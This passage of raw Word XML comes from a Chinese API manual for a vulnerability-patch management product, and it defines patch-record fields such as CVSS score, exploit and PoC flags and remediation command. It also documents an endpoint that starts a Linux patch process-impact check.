              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11EC880F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>补丁校验信息（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6C8985F5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5183D4F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>details</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="498DB91C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D03358C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F2A158C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>校验信息详情(仅linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0DF8D084" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72E4E9A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remedCmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52E3DFC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B0C3C0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(2048)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F6843AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>补丁修复命令（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="579956AD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D63FFE4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remedDesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="205CA08D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C880915" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29D12586" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修复描述（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6AC2382C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="309F1240" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>installPackage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="618BEE33" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="503E0945" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76F687BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>安装包地址（仅windows）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1883B0AA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37F1DA02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cvssScore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54455964" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="038322EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>float</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58DFB085" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Cvss分</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="55C8AF64" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F1D3524" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cvssDetail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E8C4F36" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17C7C01C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65219E74" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Cvss详情</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="122906A2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EFD74B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ref</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C731461" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55E191CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>mediumblob</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49A320AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Cve链接</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="00A3F7A1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AF02568" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>restartOpts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79D7D53A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="681C1917" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18FB6D7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修复影响:0-未知;1-不需要重启;2-服务重启;3-系统重启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2AD72D9D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D5F9D34" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hasExp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="481E92D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57F3CA89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EADC123" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否存在exp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0C1EDD21" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BFDA7F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>isKernel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D2196F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CA901E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AB9FCAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内核漏洞（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3FF4B1BD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1715E686" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>isLocalEscalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E396A9C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BBBCAE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E63A66F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>本地提权（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="37CA8221" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29536917" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>isRemote</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FF3717E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3955DC52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DF1FED8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>远程执行（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0DA63C60" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EEF07C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hasPoc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="630A2453" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1720657D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50E21E03" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>存在poc（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3BB8D18D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D66D5D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pocRefs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D265DF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33EFA3CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B6BA580" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Poc参考链接（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="62BBE73A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C4BF4F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>impacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4900E93D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4300B6A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D6B26CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>补丁特征（仅windows）：1-纵深防御；2-拒绝服务；3-权限提升；4-信息泄露；5-远程代码执行；6-安全特征绕过；7-电子欺骗；8-数据篡改</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5D558642" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DA27FB9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>firstCheckTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E0ACC60" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F4F557E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="618F9BB6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>第一次被检测出该补丁的时间(仅linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="16B0E1BA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="350C7675" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>businessImpact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A29303C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="592C3D72" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="113E1B7A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否存在进程影响 0/1 无进程影响/有进程影响(仅linux, 并且当前进程影响没有未知状态, 当主机没有进行进程影响扫描的时候, 都是无进程影响, 进程影响每天有定时执行, 所以安装主机后如果要立马知道是否补丁有进程影响, 需要先执行一次进程影响扫描, 或者等第二天定时执行后可以获得补丁是否有进程影响)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1AD05E36" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="创建linux补丁进程影响任务"/>
      <w:bookmarkEnd w:id="92"/>
      <w:r>
        <w:t>创建linux补丁进程影响任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BAF597" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6C6FA2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/patch/linux/business_impact/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14036229" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D97D3C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A6456F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC2769D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/vul/patch/linux/business_impact/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324D1CDC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5358E3C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14268064" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>情景说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241839EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>一个账号同时只能一个任务运行，因此调用这个接口前，应该先调用4.1.6查询状态接口，如果status非Running，则可以创建任务，如果创建成功，则正常返回， 如果创建失败， 则抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5072D20C"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630"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="3625"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3EFE683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FF102DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
